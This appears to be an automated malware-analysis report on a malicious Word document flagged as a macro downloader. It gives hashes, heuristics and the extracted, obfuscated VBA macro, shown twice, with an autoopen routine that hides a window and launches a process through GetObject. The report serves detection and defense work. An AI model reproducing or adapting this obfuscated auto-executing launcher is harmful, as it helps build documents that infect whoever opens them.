Office (OLE) malware analysis — malicious · 0e77a3179a5714fe

MALICIOUS

Office (OLE)

151.1 KB Created: 2019-03-20 20:39:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 95254d9838d6b1399048f85c757cf4f1 SHA-1: 3211d67d5f0e0e16ae112dc0bd2c95ede81d4f00 SHA-256: 0e77a3179a5714febef6ca5fbfbcd5fb14efabe0d07cf58680716f80880129fc

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro with an autoopen subroutine. This macro utilizes a GetObject call, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Downloader.Sagent-6904393-0' strongly suggests the macro's purpose is to download and execute a secondary payload. The VBA code is heavily obfuscated, making a precise analysis of its execution flow difficult, but the presence of autoexecuting macros and the downloader heuristic are clear indicators of malicious intent.

Heuristics 7

ClamAV: Doc.Downloader.Sagent-6904393-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sagent-6904393-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11633 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11633 bytes
SHA-256: `c417386c50c5bf2545c47b0b66774fee74533a2348fba655310e3a303eccda74`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iUCAZAC" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "KDUAAABU" Attribute VB_Base = "0{D828A9C2-6855-4194-AF8E-C580C8FAFCFB}{9F05061C-A97D-4D02-83CB-C5E0B759E425}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "pAB4wQk" Sub autoopen() On Error Resume Next If tGCQB1 = v_AAQQDQ Then FAAAAAA = 717647646 * CInt(233297471) / _ 658828767 + Sqr(207313192) * 745415091 / CInt(312963833) * (844548510 * 465056738) jZAwAB = (173316002 - Asc(YAUXAZwG) / MAAGABAA / 613300625 + _ pGwQ_x / Fix(195876274 + Log(CABGAU * Sgn(8622865) + kQAGGD1B / CSng(839957413)))) End If If ZGXUDAA = sx4UoBB Then WCAXAAk = 826349753 * CInt(520485790) / _ 444846816 + Sqr(201627611) * 494557910 / CInt(810542288) * (770000877 * 651041284) bGA1AA = (607811369 - Asc(PCAAADB) / nA1DBBQ1 / 1749335 + _ CwC1BAXA / Fix(42706618 + Log(QBAAXZ * Sgn(896449898) + iUxoGA / CSng(160651301)))) End If Set dAQAAAkk = GetObject(KDUAAABU.RAAwAUA) If iBxZAZ1Q = wBAAAkQ Then YAUADx = 721564642 * CInt(124795841) / _ 170569118 + Sqr(603655858) * 119255611 / CInt(668239378) * (80036417 * 682567044) VcUAw44 = (66576522 - Asc(lB4xUDAw) / zwGZAD / 116988703 + _ kBokZAk / Fix(804695490 + Log(uAAXA1BQ * Sgn(152929563) + nBCcZXAw / CSng(495692849)))) End If If WxZAAZ = dkDZckXA Then PXAAAA = 823422638 * CInt(608060300) / _ 935010364 + Sqr(433062525) * 819715303 / CInt(226955619) * (813395985 * 603633177) KDA4DAC = (545714479 - Asc(iUXoDG) / qk1Z44DA / 567750152 + _ S1QAAA / Fix(116103032 + Log(qAAXDkAU * Sgn(419386701) + HBAQ1A / CSng(702477642)))) End If dAQAAAkk.ShowWindow = 624343 - 624343 If IZUZA4 = jACBDkDc Then jAABCABc = 315002202 * CInt(17448769) / _ 641727752 + Sqr(639634465) * 277225128 / CInt(636151779) * (108771433 * 227949140) X4A_DA = (169290908 - Asc(EA1A4AC) / lBBAGC1 / 557148344 + _ jA_ABkQA / Fix(547372725 + Log(GUA4AAxw * Sgn(51560902) + XGZcGA / CSng(918587398)))) End If If GXXABo = RADxAG Then jBAxQDo = 415029796 * CInt(458128909) / _ 601151473 + Sqr(743114132) * 735950754 / CInt(541986983) * (985751184 * 859003777) LAxAXA = (941226414 - Asc(hAQAkwB) / HDoUxA / 760500975 + _ G_GDXw / Fix(877536082 + Log(ww_BoC_A * Sgn(808973140) + YQoxoU / CSng(76952230)))) End If GetObject(KDUAAABU.zoAAGoAG). _ Create# jUDxA4G1 + KDUAAABU.AABZGAQ + c1DA1G + KDUAAABU.TAAUQX + zC4QoQ + KDUAAABU.IA4AcUQk + iAZ_AAx, rDBAAQ, dAQAAAkk, fZAACAXA If VQXc4B = N4cA1CwU Then iZ_AXUQ = 15510243 * CInt(610907503) / _ 128885924 + Sqr(966049709) * 341295882 / CInt(333658196) * (855111941 * 446073890) KcXC4UAA = (814988864 - Asc(ZBA4ADAw) / SQwBwAxA / 254941050 + _ pwxUAB / Fix(962703864 + Log(FD1cQQ * Sgn(64483640) + NAXCABw / CSng(980357467)))) End If If iGA41A4Q = bDoBAD Then FG1DAD = 46651314 * CInt(799849451) / _ 690851463 + Sqr(742936995) * 546528798 / CInt(327037674) * (590726028 * 656524057) i_AZxAU = (65743051 - Asc(r_4cUZU) / YU1wGQ_ / 632529619 + _ EQooAA / Fix(684949678 + Log(GCCAQB * Sgn(253356467) + jxx4Ak / CSng(707364670)))) End If End Sub ' Processing file: /opt/analyzer/scan_staging/612c2d72fcb640f48dc6ad3853325a50.bin ' =============================================================================== ' Module streams: ' Macros/VBA/iUCAZAC - 1105 bytes ' Macros/VBA/KDUAAABU - 1158 bytes ' Macros/VBA/pAB4wQk - 5227 bytes ' Line #0: ' FuncDefn (Sub pAB4wQk()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' Ld autoopen ' Ld tGCQB1 ' Eq ' IfBlock ' Line #3: ' LineCont 0x0004 09 00 00 00 ' LitDI4 0x6F1E 0x2AC6 ' LitDI4 0xD63F 0x0DE7 ' Coerce (Int) ' Mul ' LitDI4 0x ... (truncated)

SHA-256: c417386c50c5bf2545c47b0b66774fee74533a2348fba655310e3a303eccda74

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iUCAZAC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KDUAAABU"
Attribute VB_Base = "0{D828A9C2-6855-4194-AF8E-C580C8FAFCFB}{9F05061C-A97D-4D02-83CB-C5E0B759E425}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pAB4wQk"
Sub autoopen()
On Error Resume Next
   If tGCQB1 = v_AAQQDQ Then
      FAAAAAA = 717647646 * CInt(233297471) / _
658828767 + Sqr(207313192) * 745415091 / CInt(312963833) * (844548510 * 465056738)
      jZAwAB = (173316002 - Asc(YAUXAZwG) / MAAGABAA / 613300625 + _
pGwQ_x / Fix(195876274 + Log(CABGAU * Sgn(8622865) + kQAGGD1B / CSng(839957413))))
End If
   If ZGXUDAA = sx4UoBB Then
      WCAXAAk = 826349753 * CInt(520485790) / _
444846816 + Sqr(201627611) * 494557910 / CInt(810542288) * (770000877 * 651041284)
      bGA1AA = (607811369 - Asc(PCAAADB) / nA1DBBQ1 / 1749335 + _
CwC1BAXA / Fix(42706618 + Log(QBAAXZ * Sgn(896449898) + iUxoGA / CSng(160651301))))
End If
Set dAQAAAkk = GetObject(KDUAAABU.RAAwAUA)
   If iBxZAZ1Q = wBAAAkQ Then
      YAUADx = 721564642 * CInt(124795841) / _
170569118 + Sqr(603655858) * 119255611 / CInt(668239378) * (80036417 * 682567044)
      VcUAw44 = (66576522 - Asc(lB4xUDAw) / zwGZAD / 116988703 + _
kBokZAk / Fix(804695490 + Log(uAAXA1BQ * Sgn(152929563) + nBCcZXAw / CSng(495692849))))
End If
   If WxZAAZ = dkDZckXA Then
      PXAAAA = 823422638 * CInt(608060300) / _
935010364 + Sqr(433062525) * 819715303 / CInt(226955619) * (813395985 * 603633177)
      KDA4DAC = (545714479 - Asc(iUXoDG) / qk1Z44DA / 567750152 + _
S1QAAA / Fix(116103032 + Log(qAAXDkAU * Sgn(419386701) + HBAQ1A / CSng(702477642))))
End If
dAQAAAkk.ShowWindow = 624343 - 624343
   If IZUZA4 = jACBDkDc Then
      jAABCABc = 315002202 * CInt(17448769) / _
641727752 + Sqr(639634465) * 277225128 / CInt(636151779) * (108771433 * 227949140)
      X4A_DA = (169290908 - Asc(EA1A4AC) / lBBAGC1 / 557148344 + _
jA_ABkQA / Fix(547372725 + Log(GUA4AAxw * Sgn(51560902) + XGZcGA / CSng(918587398))))
End If
   If GXXABo = RADxAG Then
      jBAxQDo = 415029796 * CInt(458128909) / _
601151473 + Sqr(743114132) * 735950754 / CInt(541986983) * (985751184 * 859003777)
      LAxAXA = (941226414 - Asc(hAQAkwB) / HDoUxA / 760500975 + _
G_GDXw / Fix(877536082 + Log(ww_BoC_A * Sgn(808973140) + YQoxoU / CSng(76952230))))
End If
GetObject(KDUAAABU.zoAAGoAG). _
Create# jUDxA4G1 + KDUAAABU.AABZGAQ + c1DA1G + KDUAAABU.TAAUQX + zC4QoQ + KDUAAABU.IA4AcUQk + iAZ_AAx, rDBAAQ, dAQAAAkk, fZAACAXA
   If VQXc4B = N4cA1CwU Then
      iZ_AXUQ = 15510243 * CInt(610907503) / _
128885924 + Sqr(966049709) * 341295882 / CInt(333658196) * (855111941 * 446073890)
      KcXC4UAA = (814988864 - Asc(ZBA4ADAw) / SQwBwAxA / 254941050 + _
pwxUAB / Fix(962703864 + Log(FD1cQQ * Sgn(64483640) + NAXCABw / CSng(980357467))))
End If
   If iGA41A4Q = bDoBAD Then
      FG1DAD = 46651314 * CInt(799849451) / _
690851463 + Sqr(742936995) * 546528798 / CInt(327037674) * (590726028 * 656524057)
      i_AZxAU = (65743051 - Asc(r_4cUZU) / YU1wGQ_ / 632529619 + _
EQooAA / Fix(684949678 + Log(GCCAQB * Sgn(253356467) + jxx4Ak / CSng(707364670))))
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/612c2d72fcb640f48dc6ad3853325a50.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iUCAZAC - 1105 bytes
' Macros/VBA/KDUAAABU - 1158 bytes
' Macros/VBA/pAB4wQk - 5227 bytes
' Line #0:
' 	FuncDefn (Sub pAB4wQk())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld autoopen 
' 	Ld tGCQB1 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LineCont 0x0004 09 00 00 00
' 	LitDI4 0x6F1E 0x2AC6 
' 	LitDI4 0xD63F 0x0DE7 
' 	Coerce (Int) 
' 	Mul 
' 	LitDI4 0x
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.